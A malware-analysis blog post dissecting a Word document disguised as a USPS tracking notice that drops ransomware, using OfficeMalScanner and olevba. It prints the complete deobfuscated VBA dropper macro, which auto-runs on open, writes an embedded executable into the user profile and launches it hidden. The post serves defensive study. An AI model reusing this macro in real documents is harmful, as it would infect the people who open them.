Documents From Hell Part 2

--

@author Evan Saez

@since 09/09/2016

@see malware analysis

--

After recovering from cyber security summer camp with my fellow author Randy I found myself horridly behind on blog posts and realized I was well delayed following up the analysis of our ransomeware dropper. We already determined in our previous post [word-documents-from-hell-part1] that this word document we are dissecting is loaded with some malicious VBA macro code. Let’s take a look at the methodology we’re using to examine malicious documents again.

1. Locate potentially malicious embedded code, such as shellcode, VBA macros, or JavaScript.
2. Extract suspicious code from the file.
3. If relevant, disassemble and/or debug shellcode.
4. If relevant, deobfuscate and examine JavaScript, ActionScript, or VB macro code.
5. Understand next steps in the infection chain.

We successfully completed the first two steps in our last post identifying the streams the VBA macro was located and extracting the code with oledump-py by didier stevens. We found the embedded exe file ojGLBWnEuEy.exe is being run by the VBA macro and according to this report [ransomeware report] this file is indeed a nasty piece of ransomeware.

The next step now is to identify any shell code within the document. Shellcode according to wikipedia “is a small piece of code used as the payload in the exploitation of a software vulnerability.” but in our case it could also be the command to run the exe file within the document. Once we id the location of the shell code with the doc we can dissemble it which can give more information on the malware properties and some insight on how we can write an IOC (indicator of compromise ) for this sample.

Once again we’re going to turn to the OfficeMalScanner suite for analysis. We’re going to utilize MalHostSetup’s debug scan feature to id any shell code present in the word document.

one

two

Sure enough MalHostSetup located 4 instances of the string ‘shell execute’ at offsets 0x84663, 0x86819, 0x86841, and 0x86918. If we view those offsets in a hex editor we can a get a better picture of what follows the shell execute commands.

three

We can see some VB strings preceding the shell execute command but this appears to be an empty macro.

four

Offsets 0x86819, 0x86841, and 0x86918 show the meat of malicious macro code.
We can make out a few strings associated with VBA script along with the additional shell execute commands. We can use olevba.py which is part of  Philippe Lagadec oletool suite to clean up the VBA script and get a clearer picture of the code. We’re going to use the deobfuscated option which will attempt to deobfuscate the VBA expressions and the decode option will display all the obfuscated strings with their decoded content along with the other VBA source code.

In the analysis output below we can see an outline of the VBA macro and how it iss running the embedded exe file. Now that we’ve dissected this word doc the only thing left to do is add ‘ojGlBWnEuEy.exe’ to your file blacklist on your Anti-virus or Security Appliance and hope your users are less click happy going forward. Keep in mind though while your updating your latest and greatest overpriced security tools the bad guys are probably three updates and a version upgrade ahead of you.

flux@Reverser:~/Labs-and-samples/ransoemware_blog_post/OfficeMalScanner$ olevba.py USPS_DELIVERY_TRACKING_ETA.doc.bin –deobf –decode
olevba 0.47 – http://decalage.info/python/oletools
Flags Filename
———– —————————————————————–
OLE:MASI—V USPS_DELIVERY_TRACKING_ETA.doc.bin
===============================================================================
FILE: USPS_DELIVERY_TRACKING_ETA.doc.bin
Type: OLE
——————————————————————————-
VBA MACRO ThisDocument.cls
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin – OLE stream: u’Macros/VBA/ThisDocument’
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
(empty macro)
——————————————————————————-
VBA MACRO NewMacros.bas
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin – OLE stream: u’Macros/VBA/NewMacros’
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –
Sub Wait(seconds As Integer)
Dim now As Long
now = Timer()
Do
DoEvents
Loop While (Timer < now + seconds)
End Sub

Sub Auto_Open()
Etygo12
End Sub

Sub Etygo12()
Dim Etygo7 As Integer
Dim Etygo1 As String
Dim Etygo2 As String
Dim Etygo3 As Integer
Dim Etygo4 As Paragraph
Dim Etygo8 As Long
Dim Etygo9 As Boolean
Dim Etygo5 As Integer
Dim Etygo11 As String
Dim Etygo6 As Byte
Dim Ahsfnqotcd As String
Ahsfnqotcd = “Ahsfnqotcd”
Etygo1 = “ojGlBWnEuEy.exe”
Etygo2 = Environ(“USERPROFILE”)
ChDrive (Etygo2)
ChDir (Etygo2)
Etygo3 = FreeFile()
Open Etygo1 For Binary As Etygo3
For Each Etygo4 In ActiveDocument.Paragraphs
DoEvents
Etygo11 = Etygo4.Range.Text
If (Etygo9 = True) Then
Etygo8 = 1
While (Etygo8 < Len(Etygo11))
Etygo6 = Mid(Etygo11, Etygo8, 4)
Put #Etygo3, , Etygo6
Etygo8 = Etygo8 + 4
Wend
ElseIf (InStr(1, Etygo11, Ahsfnqotcd) > 0 And Len(Etygo11) > 0) Then
Etygo9 = True
End If
Next
Close #Etygo3
Etygo13 (Etygo1)
End Sub

Sub Etygo13(Etygo10 As String)
Dim Etygo7 As Integer
Dim Etygo2 As String
Etygo2 = Environ(“USERPROFILE”)
ChDrive (Etygo2)
ChDir (Etygo2)
Wait (3)
Etygo7 = Shell(Etygo10, vbHide)
End Sub

Sub AutoOpen()
Auto_Open
End Sub

Sub Workbook_Open()
Auto_Open
End Sub
——————————————————————————-
VBA MACRO Module1.bas
in file: USPS_DELIVERY_TRACKING_ETA.doc.bin – OLE stream: u’Macros/VBA/Module1′
– – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – – –

Sub Etygo13(Etygo10 As String)
Dim Etygo7 As Integer
Dim Etygo2 As String
Etygo2 = Environ(“USERPROFILE”)
ChDrive (Etygo2)
ChDir (Etygo2)
Sleep 1000
Etygo7 = Shell(Etygo10, vbHide)
End Sub
+————+———————-+—————————————–+
| Type | Keyword | Description |
+————+———————-+—————————————–+
| AutoExec | AutoOpen | Runs when the Word document is opened
| AutoExec | Auto_Open | Runs when the Excel Workbook is opened
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened
| Suspicious | Open | May open a file
| Suspicious | Shell | May run an executable file or a system
| | | command
| Suspicious | vbHide | May run an executable file or a system
| | | command
| Suspicious | Binary | May read or write a binary file (if
| | | combined with Open)
| Suspicious | Environ | May read system environment variables
| Suspicious | Put | May write to a file (if combined with
| | | Open)
| Suspicious | VBA obfuscated | VBA string expressions were detected,
| | Strings | may be used to obfuscate strings
| | | (option –decode to see all)
| IOC | ojGlBWnEuEy.exe | Executable file name
| VBA string | %USERPROFILE%| Environ(“USERPROFILE”)
+————+———————-+—————————————–+